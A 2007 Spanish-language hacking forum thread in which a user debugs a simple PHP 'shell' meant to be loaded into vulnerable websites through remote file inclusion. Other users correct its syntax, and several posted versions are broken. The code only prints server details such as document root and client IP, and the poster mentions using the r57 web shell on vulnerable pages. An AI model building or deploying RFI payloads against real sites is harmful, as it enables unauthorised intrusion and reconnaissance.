elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Problema programacion de shell RFI
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema programacion de shell RFI  (Leído 4,277 veces)
skapunky
Electronik Engineer &
Colaborador
***
Desconectado Desconectado

Mensajes: 3.667


www.killtrojan.net


Ver Perfil WWW
Problema programacion de shell RFI
« en: 10 Julio 2007, 17:31 pm »

Buenas, he empezao con estos temas del RFI hace relativamente poco, esta mañana me animado a crear una sencillisima shell en php, pero al usar-la con paginas vulnerables no me carga la información que pido que me muestre.

Quiza es un error que he hecho al usar el php o el html y hay algo que se me escapa. Agradeceria si alguien me puede guiar o decir el error.


La shell la e alojado por si alguien quiere probar y ver que no devuelve valores:

http://xukynet.freehostia.com/x69.txt

El codigo de la shell es el siguiente:

Código:
<?php 

//*****************************************************************************************
//*                 PHP shell writted by skapunky , 2007     :: Exploit RFI ::            *
//*****************************************************************************************
//*             __$$$$$$____________________________$$$$$________   *
//*             __$$$$$$$$*_____________________,,$$$$$$$$*___   *
//*            ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__   *
//*            ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________           *
//*          ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____   *
//*           ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____   *
//*            ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__   *
//*             ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____   *
//*            __________,,,__*$$$$$$@.$$$$$$,,,,,,_______   *
//*            _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___   *
//*              ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___   *
//*             ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____   *
//*             ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___   *
//*              ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___   *
//*                 ____,$$$$$$$$$**'______$$$$$$$$$$$'***____   *
//*                   ____,,$$$$'_.*_______$$$$$$$$$__*____** _                           *                   
//*                                                                                       *
//*        License Freeware, x69.txt                   * 
//*****************************************************************************************

<html>
<body>

<?php

<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?> <br>
<b>Server Name:</b> <? echo $SERVER_NAME ?> <br>
<b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?> <br>
<b>Server Port:</b> <? echo $SERVER_PORT ?> <br>
<b>CGI usada por el servidor :</b> <? echo $GATEWAY_INTERFACE ?> <br>
<b>Directorio Root:</b> <? echo $DOCUMENT_ROOT ?> <br>
<b>Tipo de conexión:</b> <? echo $HTTP_CONNECTION ?> <br>
<b>Dirección IP Remitente:</b> <? echo $REMOTE_ADDR ?> <br>

?>


</body>
</html>
?>

Gracias de antemano, quiza es un problema que falta algun ECHO... haber si alguien me puede ayudar.

Saludos.
En línea

Killtrojan Syslog v1.44: ENTRAR
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Problema programacion de shell RFI
« Respuesta #1 en: 10 Julio 2007, 17:55 pm »

Dentro de las etiquetas <?php y ?> solo puede haber código en PHP, si quieres escribir en HTML deberás hacerlo mediante echo...

Código:
<?php 

//*****************************************************************************************
//*                 PHP shell writted by skapunky , 2007     :: Exploit RFI ::            *
//*****************************************************************************************
//*             __$$$$$$____________________________$$$$$________   *
//*             __$$$$$$$$*_____________________,,$$$$$$$$*___   *
//*            ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__   *
//*            ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________           *
//*          ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____   *
//*           ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____   *
//*            ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__   *
//*             ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____   *
//*            __________,,,__*$$$$$$@.$$$$$$,,,,,,_______   *
//*            _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___   *
//*              ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___   *
//*             ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____   *
//*             ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___   *
//*              ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___   *
//*                 ____,$$$$$$$$$**'______$$$$$$$$$$$'***____   *
//*                   ____,,$$$$'_.*_______$$$$$$$$$__*____** _                           *                   
//*                                                                                       *
//*        License Freeware, x69.txt                   * 
//*****************************************************************************************
?>
<html>
<body>



<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?> <br>
<b>Server Name:</b> <? echo $SERVER_NAME ?> <br>
<b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?> <br>
<b>Server Port:</b> <? echo $SERVER_PORT ?> <br>
<b>CGI usada por el servidor :</b> <? echo $GATEWAY_INTERFACE ?> <br>
<b>Directorio Root:</b> <? echo $DOCUMENT_ROOT ?> <br>
<b>Tipo de conexión:</b> <? echo $HTTP_CONNECTION ?> <br>
<b>Dirección IP Remitente:</b> <? echo $REMOTE_ADDR ?> <br>




</body>
</html>
En línea

skapunky
Electronik Engineer &
Colaborador
***
Desconectado Desconectado

Mensajes: 3.667


www.killtrojan.net


Ver Perfil WWW
Re: Problema programacion de shell RFI
« Respuesta #2 en: 10 Julio 2007, 18:07 pm »

Esacto, esque en una de mis pruebas en el codigo html le e puesto echo y tampoco me ha funcionado.

Aqui dejo el codigo como lo tengo puesto ahora:

Código:
<?php 

//*****************************************************************************************
//*                 PHP shell writted by skapunky , 2007     :: Exploit RFI ::            *
//*****************************************************************************************
//*             __$$$$$$____________________________$$$$$________   *
//*             __$$$$$$$$*_____________________,,$$$$$$$$*___   *
//*            ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__   *
//*            ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________           *
//*          ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____   *
//*           ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____   *
//*            ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__   *
//*             ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____   *
//*            __________,,,__*$$$$$$@.$$$$$$,,,,,,_______   *
//*            _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___   *
//*              ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___   *
//*             ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____   *
//*             ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___   *
//*              ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___   *
//*                 ____,$$$$$$$$$**'______$$$$$$$$$$$'***____   *
//*                   ____,,$$$$'_.*_______$$$$$$$$$__*____** _                           *                   
//*                                                                                       *
//*        License Freeware, x69.txt                   * 
//*****************************************************************************************

echo <html>
echo <body>
echo Información :
echo <br>
<?php

<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?> <br>
<b>Server Name:</b> <? echo $SERVER_NAME ?> <br>
<b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?> <br>
<b>Server Port:</b> <? echo $SERVER_PORT ?> <br>
<b>CGI usada por el servidor :</b> <? echo $GATEWAY_INTERFACE ?> <br>
<b>Directorio Root:</b> <? echo $DOCUMENT_ROOT ?> <br>
<b>Tipo de conexión:</b> <? echo $HTTP_CONNECTION ?> <br>
<b>Dirección IP Remitente:</b> <? echo $REMOTE_ADDR ?> <br>

?>


echo </body>
echo </html>
?>

Gracias por la ayuda. Ahora con esto asi se me ve igual...no se ven los valores de los parametros que pido en el codigo  :-\


Mira, ahora al utilizarlo en una pagina vulnerable, e probao otros como el r57 y va perfectamente, al udsar el mio este x69, me sale lo siguiente dentro la pagina vulnerable:

Citar
Parse error: parse error, expecting `','' or `';'' in http://xukynet.freehostia.com/x69.txt on line 26

No entiendo ese error....
« Última modificación: 10 Julio 2007, 18:11 pm por skapunky » En línea

Killtrojan Syslog v1.44: ENTRAR
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Problema programacion de shell RFI
« Respuesta #3 en: 10 Julio 2007, 18:59 pm »

Deberías de leerte algún manual de PHP, no tienes mucha soltura con éste...

Código:
<?php 
echo "<b>Server Software: </b>".$SERVER_SOFTWARE.
"<br><b>Server Name: </b>".$SERVER_NAME.
"<br><b>Server Protocol: </b>".$SERVER_PROTOCOL.
"<br><b>Server Port: </b>".$SERVER_PORT.
"<br><b>CGI usada por el servidor: </b>".$GATEWAY_INTERFACE.
"<br><b>Directorio Root: </b>".$DOCUMENT_ROOT.
"<br><b>Tipo de conexión: </b>".$HTTP_CONNECTION.
"<br><b>Dirección IP Remitente: </b>".$REMOTE_ADDR;
?>
En línea

Ertai
Colaborador
***
Desconectado Desconectado

Mensajes: 2.025


Ralph Wiggum


Ver Perfil
Re: Problema programacion de shell RFI
« Respuesta #4 en: 10 Julio 2007, 20:07 pm »

Las variables de entorno se guardan en un array llamado $_SERVER.

Llama a cada uno usando... $_SERVER['SERVER_PORT'], etc, etc...

Saludos y leete algun manual de PHP.
En línea

Si la felicidad se comprara, entonces el dinero sería noble.

Código:
void rotar_by_ref(int& a, int& b) {
   /* Quien dijo que no se podia sin una variable temporal? */
   *a = *a ^ *b;
   *b = *a ^ *b;
   *a = *a ^ *b;
}
skapunky
Electronik Engineer &
Colaborador
***
Desconectado Desconectado

Mensajes: 3.667


www.killtrojan.net


Ver Perfil WWW
Re: Problema programacion de shell RFI
« Respuesta #5 en: 10 Julio 2007, 23:53 pm »

Ya he mirado, que se be que hay una nueva forma de declarar las variables...esque hice php hace algunos años y tampoco muy extenso... Siento por preguntar tanto, pero bueno, por algo se empieza.


De momento tengo esto y la pagina vulnerable no me muestra nada:

Código:
<?php 

//*****************************************************************************************
//*                 PHP shell writted by skapunky , 2007     :: Exploit RFI ::            *
//*****************************************************************************************
//*             __$$$$$$____________________________$$$$$________   *
//*             __$$$$$$$$*_____________________,,$$$$$$$$*___   *
//*            ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__   *
//*            ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________           *
//*          ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____   *
//*           ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____   *
//*            ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__   *
//*             ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____   *
//*            __________,,,__*$$$$$$@.$$$$$$,,,,,,_______   *
//*            _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___   *
//*              ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___   *
//*             ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____   *
//*             ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___   *
//*              ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___   *
//*                 ____,$$$$$$$$$**'______$$$$$$$$$$$'***____   *
//*                   ____,,$$$$'_.*_______$$$$$$$$$__*____** _                           *                   
//*                                                                                       *
//*        License Freeware, x69.txt                   * 
//*****************************************************************************************

echo <html>
echo <body>
echo Información :
echo <br>


<?php
echo "<b>Server Software: </b>" $_server['SERVER_SOFTWARE'];
"<br><b>Server Name: </b>" $_server['SERVER_NAME'];
"<br><b>Server Protocol: </b>" $_server['SERVER_PROTOCOL'];
"<br><b>Server Port: </b>" $_SERVER['SERVER_PORT'];
"<br><b>CGI usada por el servidor: </b>"  $_server['GATEWAY_INTERFACE'];
"<br><b>Directorio Root: </b>"  $_server['DOCUMENT_ROOT'];
"<br><b>Tipo de conexión: </b>" $_server['HTTP_CONNECTION'];
"<br><b>Dirección IP Remitente: </b>" $_server['REMOTE_ADDR'];
?>




echo </body>
echo </html>
?>

Alguien sabe almenos como puedo testear si funciona?. Gracias por adelantado.
« Última modificación: 10 Julio 2007, 23:57 pm por skapunky » En línea

Killtrojan Syslog v1.44: ENTRAR
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Problema programacion de shell RFI
« Respuesta #6 en: 11 Julio 2007, 00:07 am »

PHP es case sensitive es decir, no es lo mismo $a que $A, partiendo de eso, $_server['SERVER_NAME'] no es lo mismo que $_SERVER['SERVER_NAME'], ya que SERVER debe de estar escrito en mayúsculas.

También he de decir a Ertai que es lo mismo $_SERVER['SERVER_NAME'] que $SERVER_NAME...

skapunky, el último código que escribí funciona correctamente, no se porque no lo utilizas.

¿Como saber si el código funciona correctamente? Sube el código a cualquier servidor con soporte PHP y si te carga todo correctamente también lo hará cuando hagas el include().
En línea

skapunky
Electronik Engineer &
Colaborador
***
Desconectado Desconectado

Mensajes: 3.667


www.killtrojan.net


Ver Perfil WWW
Re: Problema programacion de shell RFI
« Respuesta #7 en: 11 Julio 2007, 00:51 am »

Bueno, despues de muxo provar e creado un host con php y me sale un error de sitaxis..el error es el siguiente:

Citar
Parse error: syntax error, unexpected T_VARIABLE in /data/members/free/tripod/es....

El codigo empleado es:

Código:
<?php 

/*
*****************************************************************************************
*                 PHP shell writted by skapunky , 2007     :: Exploit RFI ::            *
*****************************************************************************************
*             __$$$$$$____________________________$$$$$________         *
*             __$$$$$$$$*_____________________,,$$$$$$$$*___ *
*            ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__ *
*            ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________                 *
*          ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____ *
*           ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____ *
*            ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__         *
*             ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____ *
*            __________,,,__*$$$$$$@.$$$$$$,,,,,,_______ *
*            _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___ *
*              ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___         *
*             ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____         *
*             ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___ *
*              ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___ *
*                 ____,$$$$$$$$$**'______$$$$$$$$$$$'***____ *
*                   ____,,$$$$'_.*_______$$$$$$$$$__*____** _                           *                   
*                                                                                       *
*        License Freeware, x69.txt                 * 
*****************************************************************************************
*/




"<b>Server Software: </b>" $_SERVER['SERVER_SOFTWARE'];
"<b>Server Name: </b>" $_SERVER['SERVER_NAME'];
"<b>Server Protocol: </b>" $_SERVER['SERVER_PROTOCOL'];
"<b>Server Port: </b>" $_SERVER['SERVER_PORT'];
"<b>CGI usada por el servidor: </b>"  $_SERVER['GATEWAY_INTERFACE'];
"<b>Directorio Root: </b>"  $_SERVER['DOCUMENT_ROOT'];
"<b>Tipo de conexión: </b>" $_SERVER['HTTP_CONNECTION'];
"<b>Dirección IP Remitente: </b>" $_SERVER['REMOTE_ADDR'];


?>

La linia 31 tiene puesto el punto y coma...no se cual debe ser el error,aps e quitado todo el codigo html para que sea mas sencillo esto y evitar posibles errores.

Saludos.

PD: si le pogo el comando echo antes de la linia del server software me sale el sigueinte error:

Citar
Parse error: syntax error, unexpected T_VARIABLE, expecting ',' or ';' in /data/members/free/tripod........

Gracias.
En línea

Killtrojan Syslog v1.44: ENTRAR
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Problema programacion de shell RFI
« Respuesta #8 en: 11 Julio 2007, 00:56 am »

No tienes ni idea de PHP y este no es el lugar para hablar de esto.

Si de verás te interesa el tema leete por lo menos un manual porque no sabes hacer ni lo elemental, será mejor que cierren el tema, suerte.
En línea

skapunky
Electronik Engineer &
Colaborador
***
Desconectado Desconectado

Mensajes: 3.667


www.killtrojan.net


Ver Perfil WWW
Re: Problema programacion de shell RFI
« Respuesta #9 en: 11 Julio 2007, 01:39 am »

TEMA RESUELTO

Lo que fallava eran las etiquetas de negrita y <br>.... En cuanto lo otro va perfectamente.
En línea

Killtrojan Syslog v1.44: ENTRAR
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema de programacion
Programación C/C++
jberlin 1 2,326 Último mensaje 27 Enero 2011, 01:39 am
por Destro-
problema programacion
Programación C/C++
furia89 0 1,572 Último mensaje 27 Junio 2011, 00:53 am
por furia89
Problema con shell. BUG : TimThumb
Hacking
buscador-tecnologico 3 3,962 Último mensaje 20 Diciembre 2011, 14:59 pm
por toxeek
Programacion shell y awk
GNU/Linux
idelkys 0 1,416 Último mensaje 13 Julio 2012, 00:49 am
por idelkys
Programación en shell « 1 2 »
Scripting
Lariscal23 12 10,058 Último mensaje 3 Febrero 2022, 17:43 pm
por .xAk.
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines